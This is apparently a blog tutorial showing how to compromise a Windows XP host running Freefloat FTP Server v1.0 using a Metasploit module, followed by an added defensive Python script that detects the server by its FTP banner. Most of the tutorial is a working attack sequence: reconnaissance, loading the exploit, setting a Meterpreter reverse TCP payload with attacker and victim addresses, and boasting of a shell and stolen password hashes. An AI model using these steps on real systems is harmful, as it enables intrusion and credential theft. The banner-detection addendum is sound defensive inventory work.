Type : Tutorial
Level : Medium
Victim O.S : Windows XP SP 3
Victim Vulnerable Application : Freefloat FTP Server v1.0
Attacker O.S : Backtrack 5 R1
Exploit Credit : Veerendra G.G SecPod Technologies (www.secpod.com)
Another vulnerable application that I found while surfing around on Packet Storm. In this tutorial I will also try to explain, step by step and in detail, how to perform this attack using the Metasploit framework.
1. Metasploit framework
2. freefloat_ftp_apee_cmd.rb exploit script (click here)
3. Freefloat FTP server v1.0 (download from mediafire.com)
Attacker IP : 192.168.8.93
Victim IP : 192.168.8.91
1. The first step is to do some scanning to find out whether anyone on our network is running this vulnerable software. Let's say I already know that there is a computer with IP 192.168.8.91 that has port 21 (FTP) open. Then I want to know which FTP software it runs, by performing a simple banner grab.
ftp 192.168.8.91
There it is: the victim uses Freefloat FTP Server.
2. Copy freefloat_ftp_apee_cmd.rb to the /pentest/exploits/framework/modules/exploits/remote/ folder.
cp freefloat_ftp_apee_cmd.rb /pentest/exploits/framework/modules/exploits/remote/
3. Next, prepare the Metasploit console by running the msfconsole command, then load the exploit and choose a payload.
msf > use exploit/remote/freefloat_ftp_apee_cmd
msf exploit(freefloat_ftp_apee_cmd) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
4. There are a few switches you need to set when using this exploit (see picture below); if you want to view all of the options, just run the show options command.
Information:
set rhost 192.168.8.91 --> your target's IP address
set lhost 192.168.8.93 --> the attacker computer's IP address
set lport 443 --> the port on your local computer used to handle the payload connection
5. Everything is set up nicely up to this point; the last step is to run the exploit with the exploit command and see whether it works.
PWNED!
We got the victim machine and also the password hashes (click here to view how to crack the password hash). If you want to know more about what Meterpreter can do, you can view the tutorials here and here.
1. At the time of writing this tutorial (11-9-2011) there is still no fix; you can temporarily switch to another FTP server application until the developer patches it.
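Since the only countermeasure at this point is to replace the software, a defender's first job is to find every Freefloat FTP install on their own network, which is the same banner grab as step 1 but automated. The following is an added example, not part of the original tutorial or the exploit module: it reads an RFC 959 greeting (including the multi-line `220-` form), flags Freefloat by its banner text, and includes a constructed local stand-in server so it runs offline. The banner regex and the sample greeting text are assumptions; match them against what your own `ftp` session shows.

```python
import re
import socket
import threading

# Greeting pattern for Freefloat FTP Server. Assumption: the real daemon
# names itself in its 220 reply; adjust the regex to the exact text you
# see in your own `ftp` session (as in step 1 above).
FREEFLOAT_RE = re.compile(r"freefloat\s+ftp\s+server", re.IGNORECASE)
VERSION_RE = re.compile(r"version\s*(\d+(?:\.\d+)*)", re.IGNORECASE)

def read_greeting(sock, timeout=3.0):
    """Read the RFC 959 greeting: a single '220 text' line, or a '220-'
    multi-line block that is terminated by a line starting with '220 '."""
    sock.settimeout(timeout)
    buf = b""
    while not re.search(rb"(?m)^220 [^\r\n]*\r?\n", buf):
        chunk = sock.recv(1024)
        if not chunk:          # server closed before finishing the greeting
            break
        buf += chunk
    return buf.decode("latin-1", "replace")

def classify_greeting(greeting):
    """Return {'freefloat': bool, 'version': str|None} for one greeting."""
    text = " ".join(line[4:] for line in greeting.splitlines()
                    if line.startswith("220"))
    m = VERSION_RE.search(text)
    return {"freefloat": bool(FREEFLOAT_RE.search(text)),
            "version": m.group(1) if m else None}

def check_host(host, port=21):
    """Connect, grab the greeting and classify it (inventory check only)."""
    with socket.create_connection((host, port), timeout=3.0) as s:
        return classify_greeting(read_greeting(s))

def serve_fake_greeting(lines):
    """Constructed stand-in for a real daemon so the check runs offline:
    listens on a random local port, sends `lines` as the greeting, closes."""
    srv = socket.socket()
    srv.bind(("127.0.0.1", 0))
    srv.listen(1)
    def run():
        conn, _ = srv.accept()
        conn.sendall("".join(l + "\r\n" for l in lines).encode())
        conn.close()
        srv.close()
    threading.Thread(target=run, daemon=True).start()
    return srv.getsockname()[1]

if __name__ == "__main__":
    # Constructed sample greeting, not captured from a real server.
    port = serve_fake_greeting(["220-Welcome", "220 FreeFloat Ftp Server (Version 1.00)."])
    print(check_host("127.0.0.1", port))   # {'freefloat': True, 'version': '1.00'}
```

Point `check_host` at each FTP host from your asset list; any result with `freefloat` set to True is a server to replace until a patched version exists.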
Hope it's useful!